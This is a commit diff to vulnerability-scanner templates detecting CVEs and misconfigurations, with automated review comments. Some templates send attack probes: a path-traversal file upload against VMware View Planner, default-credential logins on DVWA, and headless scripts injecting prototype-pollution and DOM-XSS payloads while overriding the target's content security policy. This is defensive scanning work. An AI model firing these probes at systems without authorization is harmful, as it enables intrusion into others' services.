@ -3,6 +3,8 @@ info:
name: Palo Alto Networks Reflected XSS
author: madrobot
severity: medium
description: >
A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: cve,cve2020,vpn,xss


@ -4,6 +4,11 @@ info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
reference: |
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
tags: cve,cve2020,jenkins,xss
requests:


@ -1,10 +1,10 @@
id: CVE-2020-2140
info:
author: j3ssie/geraldino2
name: Jenkin AuditTrailPlugin XSS
name: Jenkin Audit Trail Plugin XSS
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-2140
reference: https://www.jenkins.io/security/advisory/2020-03-09/
tags: cve,cve2020,jenkins,xss
requests:


@ -1,7 +1,7 @@
id: CVE-2020-22840
info:
name: CVE-2020-22840
name: b2evolution CMS Open redirect
author: geeknik
severity: low
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.


@ -1,11 +1,13 @@
id: CVE-202025213
id: CVE-2020-25213
info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
reference: |
- https://plugins.trac.wordpress.org/changeset/2373068
- https://github.com/w4fz5uck5/wp-file-manager-0day
tags: cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-


@ -1,9 +1,9 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
tags: cve,cve2020,cisco,lfi
requests:


@ -5,12 +5,12 @@ info:
author: CasperGN
severity: critical
description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
reference: |
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
- https://pypi.org/project/alerta-server/8.1.0/
tags: cve,cve2020,alerta
# Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
# Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2
requests:
- method: GET
path:


@ -8,7 +8,7 @@ info:
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
references: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
tags: cve,cve2020,sonarqube
requests:
@ -25,7 +25,7 @@ requests:
- email.smtp_port.secured
- email.smtp_username.secured
part: body
condtion: and
condition: and
- type: status
status:
- 200
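Review bot: `references:` on the corrected line is still not the key the rest of the repository uses — every other `info` block in this commit spells it `reference:` (singular), so if the loader only knows `reference` the NVD link is still silently dropped; it should read `reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27986`. The `condtion` → `condition` fix in the second hunk is correct, and the same fix recurs in the hunks at `VSPHERE-UI-JSESSIONID`, `plotted`/`timing`/`cachehit`, `numRowsRead`/`numRowsIndexed` and `file_permissions`, but it is a behavior change rather than a cosmetic one: a misspelled key was presumably ignored and the matcher fell back to the default OR over its words, whereas `condition: and` now requires every listed word, so these templates become stricter and should be re-run against a known-affected instance to confirm they still match.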


@ -20,13 +20,15 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- type: word
words:
- plotted
- timing
- cachehit
part: body
condtion: and
condition: and
- type: word
words:
- application/json


@ -1,9 +1,13 @@
id: CVE-202026073
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
description: |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.
reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: Directory Traversal
requests:
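Review bot: `tags: Directory Traversal` on the new tags line breaks the convention every other template in this commit follows — comma-separated lowercase tokens — so tag-based template selection for `cisco` or `lfi` will not pick this file up; it should be `tags: cve,cve2020,cisco,lfi`, which is exactly what the other template carrying the same `id: CVE-2020-26073` earlier in this commit uses. Two files sharing one id also looks like a duplicate template; if both are intentionally kept, their `reference` and `description` fields should at least agree (the earlier copy has the mitre link and no description, this one the Cisco advisory and a description).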


@ -21,7 +21,7 @@ requests:
words:
- "VSPHERE-UI-JSESSIONID"
part: header
condtion: and
condition: and
- type: regex
regex:
- "(Install|Config) Final Progress"


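--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,44 @@
+id: CVE-2021-21978
+info:
+name: VMware View Planner Unauthenticated RCE
+author: dwisiswant0
+severity: critical
+reference: https://twitter.com/osama_hroot/status/1367258907601698816
+description: |
+This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
+Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
+An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
+file leading to remote code execution within the logupload container.
+tags: cve,cve2021,vmware,rce
+requests:
+- raw:
+- |
+POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
+Host: {{Hostname}}
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
+Accept: text/html
+Referer: {{BaseURL}}
+Connection: close
+------WebKitFormBoundarySHHbUsfCoxlX1bpS
+Content-Disposition: form-data; name="logfile"; filename=""
+Content-Type: text/plain
+POC_TEST
+------WebKitFormBoundarySHHbUsfCoxlX1bpS
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "File uploaded successfully."
+part: body
+- type: dsl
+dsl:
+- "len(body) == 28" # length of "\nFile uploaded successfully."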


@ -42,10 +42,10 @@ requests:
words:
- "application/json"
part: header
condtion: and
condition: and
- type: regex
regex:
- "numRowsRead"
- "numRowsIndexed"
part: body
condtion: and
condition: and


@ -6,6 +6,8 @@ info:
severity: medium
tags: apache,activemq,dlogin
# We could add a request condition block to only send this request if the
# site response URL had activeMQ broker stuff in the source.
requests:
- method: GET
path:
@ -18,6 +20,3 @@ requests:
- 'Welcome to the Apache ActiveMQ Console of <b>'
- '<h2>Broker</h2>'
condition: and
# We could add a request condition block to only send this request if the
# site response URL had activeMQ broker stuff in the source.


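--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,44 @@
+id: dvwa-default-login
+info:
+name: DVWA Default Login
+author: pdteam
+severity: critical
+requests:
+- raw:
+- |
+GET /login.php HTTP/1.1
+Host: {{Hostname}}
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Connection: close
+- |
+POST /login.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID={{session}}; security=low
+Connection: close
+username=admin&password=password&Login=Login&user_token={{token}}
+extractors:
+- type: regex
+name: token
+group: 1
+internal: true
+part: body
+regex:
+- "hidden' name='user_token' value='([0-9a-z]+)'"
+- type: kval
+name: session
+internal: true
+part: body
+kval:
+- PHPSESSID
+redirects: true
+matchers:
+- type: word
+words:
+- "You have logged in as 'admin'"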


@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
req-condition: true
redirects: true
max-redirects: 2
matchers:


@ -1,13 +1,10 @@
id: workspace-one-uem
# Reference:
# https://twitter.com/Jhaddix/status/1295861505963909120
info:
name: Workspace ONE UEM AirWatch Login Page
author: gevakun
severity: info
reference: https://twitter.com/Jhaddix/status/1295861505963909120
requests:
- method: GET
path:


@ -5,16 +5,15 @@ info:
author: nadino
severity: info
# Notes:-
# This template requires manual inspection once found valid match.
# Generic token could be anything matching below regex.
# Impact of leaked token depends on validation of leaked token.
requests:
- method: GET
path:
- '{{BaseURL}}'
# Notes:-
# This template requires manual inspection once found valid match.
# Generic token could be anything matching below regex.
# Impact of leaked token depends on validation of leaked token.
matchers-condition: and
matchers:
- type: dsl


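--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,24 @@
+id: circleci-config
+info:
+name: circleci config.yml exposure
+author: geeknik
+severity: low
+reference: https://circleci.com/docs/2.0/sample-config/
+requests:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/.circleci/config.yml"
+matchers-condition: and
+matchers:
+- type: dsl
+dsl:
+- 'regex("^version: ", body) && contains(body, "jobs:") == true'
+- type: status
+status:
+- 200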
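Review bot: `regex("^version: ", body)` anchors at the very start of the response body, so a config.yml that opens with a comment, a `---` document marker or a BOM is never matched even though `jobs:` is present; in Go regexp syntax a multi-line anchor, `'regex("(?m)^version: ", body) && contains(body, "jobs:")'`, avoids the miss, and the `== true` after `contains(...)` is redundant. With `redirects: true` and `max-redirects: 3` a catch-all page that redirects to a 200 is accepted by the status matcher, so the content match is doing all the discrimination here — worth a comment so nobody later loosens the dsl.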


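--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,26 @@
+id: circleci-ssh-config
+info:
+name: circleci ssh-config exposure
+author: geeknik
+severity: low
+requests:
+- method: GET
+redirects: true
+max-redirects: 3
+path:
+- "{{BaseURL}}/.circleci/ssh-config"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "Host"
+- "HostName"
+- "IdentityFile"
+condition: and
+- type: status
+status:
+- 200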
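Review bot: `"Host"` in the word matcher adds nothing under `condition: and`, because word matching is a substring test and `"HostName"` already contains it; keeping `HostName` and `IdentityFile` alone expresses the same condition without the misleading third term. The sibling `circleci-config` template added in this commit carries a `reference:` line; this one has none, and a pointer to the ssh-config format it expects would help a reader judge false positives.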


@ -2,7 +2,7 @@ id: docker-compose-config
info:
name: docker-compose.yml exposure
author: meme-lord & blckraven
author: meme-lord & blckraven & geeknik
severity: medium
requests:
@ -16,6 +16,8 @@ requests:
- "{{BaseURL}}/docker-compose.staging.yml"
- "{{BaseURL}}/docker-compose.dev.yml"
- "{{BaseURL}}/docker-compose-dev.yml"
- "{{BaseURL}}/docker-compose.override.yml"
matchers-condition: and
matchers:
- type: dsl


@ -19,7 +19,7 @@ requests:
- "file_permissions"
- "extra_list_connections"
part: body
condtion: and
condition: and
- type: status
status:


@ -3,10 +3,7 @@ info:
name: Lotus Domino Configuration Page
author: gevakun
severity: low
# Reference:
# https://twitter.com/Wh11teW0lf/status/1295594085445709824
# Do not test any website without permission
reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824
requests:
- method: GET


@ -46,8 +46,8 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
req-condition: true
matchers:
- type: dsl
name: iis-scan
dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"


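--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,43 @@
+id: dvwa-headless-automatic-login
+info:
+name: DVWA Headless Automatic Login
+author: pdteam
+severity: high
+tags: headless
+headless:
+- steps:
+- args:
+url: "{{BaseURL}}/login.php"
+action: navigate
+- action: waitload
+- args:
+by: x
+xpath: /html/body/div/div[2]/form/fieldset/input
+action: click
+- action: waitload
+- args:
+by: x
+value: admin
+xpath: /html/body/div/div[2]/form/fieldset/input
+action: text
+- args:
+by: x
+xpath: /html/body/div/div[2]/form/fieldset/input[2]
+action: click
+- action: waitload
+- args:
+by: x
+value: password
+xpath: /html/body/div/div[2]/form/fieldset/input[2]
+action: text
+- args:
+by: x
+xpath: /html/body/div/div[2]/form/fieldset/p/input
+action: click
+- action: waitload
+matchers:
+- part: resp
+type: word
+words:
+- "You have logged in as"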


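--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,65 @@
+id: postmessage-tracker
+info:
+name: Postmessage Tracker
+author: pd-team
+severity: info
+reference: https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js
+tags: headless,postmessage
+headless:
+- steps:
+- action: setheader
+args:
+part: response
+key: Content-Security-Policy
+value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+- action: script
+args:
+hook: true
+code: |
+(function() {window.alerts = [];
+function logger(found) {
+window.alerts.push(found);
+}
+function getStackTrace () {
+var stack;
+try {
+throw new Error('');
+}
+catch (error) {
+stack = error.stack || '';
+}
+stack = stack.split('\n').map(function (line) { return line.trim(); });
+return stack.splice(stack[0] == 'Error' ? 2 : 1);
+}
+var oldListener = Window.prototype.addEventListener;
+Window.prototype.addEventListener = function(type, listener, useCapture) {
+if(type === 'message') {
+logger(getStackTrace());
+}
+return oldListener.apply(this, arguments);
+};
+})();
+- args:
+url: "{{BaseURL}}"
+action: navigate
+- action: waitload
+- action: script
+name: alerts
+args:
+code: "window.alerts"
+matchers:
+- type: word
+part: alerts
+words:
+- "at Window.addEventListener"
+extractors:
+- type: kval
+part: alerts
+kval:
+- alerts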
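Review bot: The hook only wraps `Window.prototype.addEventListener`, so a page that registers its handler with `window.onmessage = ...`, or on a child frame's own window object, produces no entry in `window.alerts` and the template reports nothing; if that is an accepted limitation it belongs in a `description:` line, otherwise a setter hook on `onmessage` next to the existing one would close the gap. The word matcher `"at Window.addEventListener"` depends on the browser engine's stack-frame formatting rather than on anything the hook itself writes, so a change of headless engine or a renamed frame silently turns every result negative — pushing a fixed marker string into the logged record and matching on that is more robust. The `Content-Security-Policy` override (`default-src *` with `'unsafe-inline'`/`'unsafe-eval'`) is presumably there so the injected hook can run; a comment stating that, and that it removes the target's CSP only for this scan session, would help readers.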


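--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,96 @@
+id: prototype-pollution-check
+info:
+name: Prototype Pollution Check
+author: pd-team
+severity: medium
+reference: https://github.com/msrkp/PPScan
+tags: headless
+headless:
+- steps:
+- action: setheader
+args:
+part: response
+key: Content-Security-Policy
+value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+- action: setheader
+args:
+part: response
+key: X-Frame-Options
+value: foo
+- action: setheader
+args:
+part: response
+key: If-None-Match
+value: foo
+- action: script
+args:
+hook: true
+code: |
+// Hooking code adapted from https://github.com/msrkp/PPScan/blob/main/scripts/content_script.js
+(function() {window.alerts = [];
+function logger(found) {
+window.alerts.push(found);
+}
+function check() {
+loc = location.href;
+if (loc.indexOf("e32a5ec9c99") >= 0 && loc.search("a0def12bce") == -1) {
+setTimeout(function() {
+if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60") {
+logger(location.href);
+}
+var url = new URL(location.origin + location.pathname);
+url.hash = "__proto__[a0def12bce]=ddcb362f1d60&__proto__.a0def12bce=ddcb362f1d60&dummy";
+location = url.href;
+}, 5 * 1000);
+} else if (loc.search("a0def12bce") != -1) {
+setTimeout(function() {
+if (Object.prototype.a0def12bce == "ddcb362f1d60") {
+logger(location.href);
+}
+window.close();
+}, 5 * 1000);
+} else {
+var url = new URL(loc);
+url.searchParams.append("__proto__[e32a5ec9c99]", "ddcb362f1d60");
+url.searchParams.append("__proto__.e32a5ec9c99", "ddcb362f1d60");
+location = url.href;
+}
+}
+window.onload = function() {
+if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
+logger(location.href);
+} else {
+check();
+}
+};
+var timerID = setInterval(function() {
+if (Object.prototype.e32a5ec9c99 == "ddcb362f1d60" || Object.prototype.a0def12bce == "ddcb362f1d60") {
+logger(location.href);
+clearInterval(timerID);
+}
+}, 5 * 1000)})();
+- args:
+url: "{{BaseURL}}"
+action: navigate
+- action: waitload
+- action: script
+name: alerts
+args:
+code: "window.alerts"
+matchers:
+- type: word
+part: alerts
+words:
+- "__proto__"
+extractors:
+- type: kval
+part: alerts
+kval:
+- alerts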
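Review bot: `loc = location.href;` at the top of `check()` assigns an undeclared name, creating an implicit global (and a ReferenceError if the page runs in strict mode); it should be `var loc = location.href;`. More importantly the probe is timer-driven — `check()` runs from `window.onload`, re-navigates the page up to twice, and each stage only writes to `window.alerts` after a `5 * 1000` ms `setTimeout` — while the `alerts` script is executed right after the first `waitload`, so unless the headless engine re-injects the hook on every navigation and waits out those timers the matcher most likely reads an empty array; a wait step before the final script, or shorter delays, should be considered and the expectation documented. The `If-None-Match: foo` response header and the `X-Frame-Options: foo` override have no obvious purpose in this template and deserve a one-line comment each (the PPScan source the header comment cites may explain them).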


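--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,81 @@
+id: window-name-domxss
+info:
+name: window.name DOM XSS
+author: pd-team
+severity: medium
+reference: https://public-firing-range.appspot.com/dom/index.html
+tags: headless,xss,domxss
+headless:
+- steps:
+- action: setheader
+args:
+part: response
+key: Content-Security-Policy
+value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
+- action: script
+args:
+hook: true
+code: |
+(function() {window.alerts = [];
+function logger(found) {
+window.alerts.push(found);
+}
+function getStackTrace () {
+var stack;
+try {
+throw new Error('');
+}
+catch (error) {
+stack = error.stack || '';
+}
+stack = stack.split('\n').map(function (line) { return line.trim(); });
+return stack.splice(stack[0] == 'Error' ? 2 : 1);
+}
+window.name = "{{randstr_1}}'\"<>";
+var oldEval = eval;
+var oldDocumentWrite = document.write;
+var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
+Object.defineProperty(Element.prototype, 'innerHTML', {
+set: function innerHTML_Setter(val) {
+if (val.includes("{{randstr_1}}'\"<>")) {
+logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});
+}
+return setter.call(this, val)
+}
+});
+eval = function(data) {
+if (data.includes("{{randstr_1}}'\"<>")) {
+logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});
+}
+return oldEval.apply(this, arguments);
+};
+document.write = function(data) {
+if (data.includes("{{randstr_1}}'\"<>")) {
+logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});
+}
+return oldEval.apply(this, arguments);
+};
+})();
+- args:
+url: "{{BaseURL}}"
+action: navigate
+- action: waitload
+- action: script
+name: alerts
+args:
+code: "window.alerts"
+matchers:
+- type: word
+part: alerts
+words:
+- "sink:"
+extractors:
+- type: kval
+part: alerts
+kval:
+- alerts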
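Review bot: The `document.write` hook at the end of the IIFE calls `oldEval.apply(this, arguments)` instead of the saved `oldDocumentWrite`, so once the hook is installed every `document.write(html)` on the page is evaluated as JavaScript — normally a SyntaxError on the first `<` — and the page's own output is lost, while `oldDocumentWrite` is declared and never used; the return line should be `return oldDocumentWrite.apply(this, arguments);`. The canary `{{randstr_1}}'\"<>` is also interpolated into the three `includes(...)` string literals, so the template depends on `randstr_1` never containing a quote or backslash — presumably it is alphanumeric, but that assumption is worth a comment. Only `innerHTML` on `Element.prototype` is hooked; `outerHTML`, `insertAdjacentHTML` and `setAttribute` sinks fall through silently, which should be stated in a `description:` line so negative results are read as "not covered" rather than "not vulnerable".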


@ -6,6 +6,7 @@ info:
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243
tags: aem
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Apache Airflow API Exposure / Unauthenticated Access
author: pd-team
severity: medium
tags: apache,airflow,unauth
requests:
- method: GET


@ -6,6 +6,7 @@ info:
severity: low
description: The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection.
reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
tags: apache
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: APCu service information leakage
author: koti2
severity: low
tags: config
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: info
reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled
tags: debug
requests:
- raw:


@ -5,6 +5,7 @@ info:
author: manikanta a.k.a @secureitmania
severity: info
reference: https://link.medium.com/fgXKJHR9P7
tags: aws
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: CGI Test page
author: YASH ANAND @yashanand155
severity: info
tags: cgi
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDK
severity: high
reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
tags: dlink,lfi
requests:
- method: POST


@ -4,6 +4,7 @@ info:
name: Django Debug Method Enabled
author: dhiyaneshDK
severity: medium
tags: django,debug
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Docker Registry Listing
author: puzzlepeaches
severity: medium
tags: docker
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
severity: high
tags: druid,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Ajax]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Drupal User Enumration [Redirect]
author: 0w4ys
severity: info
tags: drupal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: ElasticSearch Information Disclosure
author: Shine
severity: low
tags: es,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
severity: info
tags: docker,unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Exposed Kibana
author: Shine
severity: medium
tags: kibana,unauth
requests:
- method: GET


@ -5,11 +5,10 @@ info:
author: dhiyaneshDK
severity: info
description: detectes misconfigured Service-now ITSM instances
reference: https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Thanks to Th3G3nt3lman for the writeup
# https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
# Exploitation :- https://github.com/leo-hildegarde/SnowDownKB/
reference: |
- https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56
- https://github.com/leo-hildegarde/SnowDownKB/
tags: servicenow
requests:
- method: GET


@ -4,8 +4,7 @@ info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
severity: info
# Reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
requests:
- method: GET


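--- /dev/null
+++ b/<path-not-shown>
@@ -0,0 +1,29 @@
+id: gitlab-public-repos
+info:
+name: GitLab public repositories
+author: ldionmarcil
+severity: info
+tags: gitlab
+reference: |
+- https://twitter.com/ldionmarcil/status/1370052344562470922
+- https://github.com/ldionmarcil/gitlab-unauth-parser
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/api/v4/projects"
+headers:
+Cookie: _gitlab_session=
+matchers-condition: and
+matchers:
+- type: word
+part: header
+words:
+- "Set-Cookie: _gitlab_session="
+- type: word
+part: body
+words:
+- "name_with_namespace"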


@ -3,6 +3,7 @@ info:
name: GitLab public snippets
author: pdteam
severity: info
tags: gitlab
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:


@ -4,6 +4,7 @@ info:
name: Apache Hadoop Unauth
author: pdteam
severity: low
tags: apache,hadoop,unauth
requests:
- method: GET


@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/ghdb/4191
tags: logs
tags: logs,haproxy
requests:
- method: GET


@ -4,7 +4,7 @@ info:
name: Horde Groupware Unauthenticated
author: pikpikcu
severity: critical
tags: horde
tags: horde,unauth
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: high
reference: https://hackerone.com/reports/1088429
tags: unauth
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK
severity: medium
tags: config
requests:
- method: GET
